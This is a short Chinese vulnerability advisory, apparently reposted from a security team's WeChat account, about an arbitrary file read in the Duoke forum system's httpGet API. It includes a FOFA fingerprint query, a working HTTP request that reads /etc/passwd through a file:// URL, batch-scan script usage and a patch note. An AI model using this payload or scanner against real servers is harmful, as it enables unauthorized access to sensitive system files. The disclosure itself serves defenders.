fofa
title="多客-兴趣交友神器"一、漏洞简述
多客圈子论坛系统是支持文字发帖、语音贴、视频贴等,并可以创建语音聊天、在线聊天、语音房APP。快速建立社区兴趣圈、语音直播、礼物、商城、充值、宝箱、陌生社交系统APP、语音交友系统APP、婚恋系统app、直播系统app、本地门户app等各类应用的系统产品。其接口httpGet存在任意文件读取漏洞,攻击者可通过该漏洞获取系统敏感信息。
二、漏洞检测poc
GET /index.php/api/login/httpGet?url=file:///etc/passwd HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36Content-Length: 2
三、漏洞检测脚本
安全测试人员可通过该脚本进行探测自身服务是否存在此漏洞:
https://github.com/ATonysan/poc-exp/blob/main/Duoke_httpGet_ArbitraryFileRead.py
批量检测:
python Duoke_httpGet_ArbitraryFileRead.py -f url.txt
单个url检测漏洞:
python Duoke_httpGet_ArbitraryFileRead.py -u url
四、修复
官方已更新补丁,请升级至最新版本。
官网地址:https://gitee.com/ZEROBOX/zssdxiaoli
原文始发于微信公众号(苏诺木安全团队):【1day】多客圈子论坛系统 httpGet 任意文件读取漏洞【附poc】
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论